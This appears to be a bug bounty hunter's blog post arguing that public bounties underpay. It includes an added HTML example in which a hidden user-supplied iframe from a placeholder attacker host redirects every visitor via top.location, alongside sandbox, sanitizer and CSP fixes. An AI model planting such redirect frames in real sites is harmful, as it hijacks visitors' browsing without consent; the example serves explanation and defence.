When it comes to public bounties I don’t spend a lot of time on them, because even though they usually pay, the amount can be insulting. I know, I know, if you’re getting paid you shouldn’t be insulted, but think about it. If you demanded I make two separate exploits for you, but said you were only paying for one of them, then I would only make one proof of concept. If you went to a restaurant and said you only had enough money for two pancakes, but demanded four, they’d only make two or they’d kick you out.
The bounty that demanded two proofs of concept for the price of one only paid $50. The issue wasn’t CSRF; rather, any signed-up user of this product could create malicious iframes or upload malicious images. I think that’s worth more than $50.
I feel that it’s pointless to look for bugs that have a greater impact, like RCE, SQLi, etc., if you don’t even know whether the company will pay an adequate amount. Also, it’s extremely insulting when companies add terms and conditions saying they will own your exploit if you submit it and you can’t use it anywhere else. A lot of bugs can be used across the board, especially when it comes to open source bugs. It’s a slap in the face when the bounty doesn’t pay anything, not even points. If it doesn’t pay well, then I just ignore it.
It would be extremely useful for companies to have a minimum amount for each type of bug; that way you know the minimum you can make per bug and whether it’s worth your time looking for more severe bugs. It would also be useful to have a ratio of how often they actually pay.
The problem with what I proposed above is that the company may try to downgrade the bug. In the one issue I talked about above, the company thought the Same-Origin Policy would protect them from malicious iframes. It took a lot of explaining to get through to them, and refining the proof of concept over and over, until I just made it so that if anyone accessed their test site they were redirected to a picture I made of a skull and crossbones saying “Argh, I love bounties”, hosted on my company’s site. I still believe that’s worth more than $50, since any user could do that, but I just won’t work with that company again.
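The point the vendor missed is that the Same-Origin Policy restricts what a frame can read from the page that embeds it, not whether it can navigate that page. The markup below is an added illustration and is not the author’s proof of concept or the vendor’s code; the hostnames attacker.example and victim.example are placeholders, and the assumption is that the site rendered a user-supplied iframe tag unmodified for every visitor.

```html
<!-- Constructed example. Assumes victim.example renders user-supplied HTML,
     including <iframe> tags, for every visitor of the affected page. -->

<!-- 1. What an unrestricted user-supplied iframe can do. The script inside runs
     with attacker.example's origin. The Same-Origin Policy stops it from
     reading victim.example's DOM, cookies or storage, but it does not stop it
     from writing top.location, so every visitor is sent to the attacker's URL. -->
<iframe src="https://attacker.example/frame.html" style="display:none"></iframe>

<!-- Contents of https://attacker.example/frame.html (attacker controlled) -->
<script>
  // Cross-origin assignment to top.location is allowed by the SOP.
  // Caveat: recent Chromium-based browsers block a top-level navigation from a
  // cross-origin frame that has never received user activation, so this
  // behaves differently across browsers and browser versions.
  if (window.top !== window) {
    window.top.location = "https://attacker.example/skull.png";
  }
</script>

<!-- 2. Hardened rendering of a user-supplied frame: with the sandbox attribute
     and no allow-top-navigation (or allow-top-navigation-by-user-activation),
     the assignment above throws a SecurityError instead of redirecting.
     Omitting allow-same-origin also gives the frame an opaque origin. -->
<iframe src="https://attacker.example/frame.html"
        sandbox="allow-scripts"
        referrerpolicy="no-referrer"></iframe>
```

If user content does not legitimately need frames at all, stripping `<iframe>` (and `<object>`/`<embed>`) with an HTML sanitizer, or restricting embeddable origins with a Content-Security-Policy `frame-src` directive, is the simpler fix; the sandbox attribute is the option when frames from arbitrary origins must be allowed.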
What I am trying to say is that when you don’t know how much you will get paid, you don’t have as big an incentive to work on the project. I view private bounties differently than public bounties.
When I work on private bounties I work a lot harder than on public bounties. There was one project that had a high minimum payout. I knew the company well, and their reputation for not paying. I decided to make three proofs of concept and put a lot of time into one of them. While every exploit met the conditions of the bounty and broke the security exactly as they asked, only one was worth the amount they were offering. Sadly, the company didn’t want to pay for any of them. I wasn’t thrilled with that, but the bounty still had a good ending thanks to bugcrowd. I can’t say any more than that, because what happens in a private bounty stays private.
Also, XSS can sometimes be quite bad for a company, especially if it defaces the entire site. If an XSS defaces the entire site or a subdomain, it’s worth more than the average $100, since a defacement is just a simple example: you could have malicious code load on every page, etc. Also, how do we rank how much chained exploits are worth? Is each part of the chain worth the minimum for that type of exploit, and you add them together? Or are chains worth more?
These are just a few things I have to say about payment per bug. I may add a longer post later.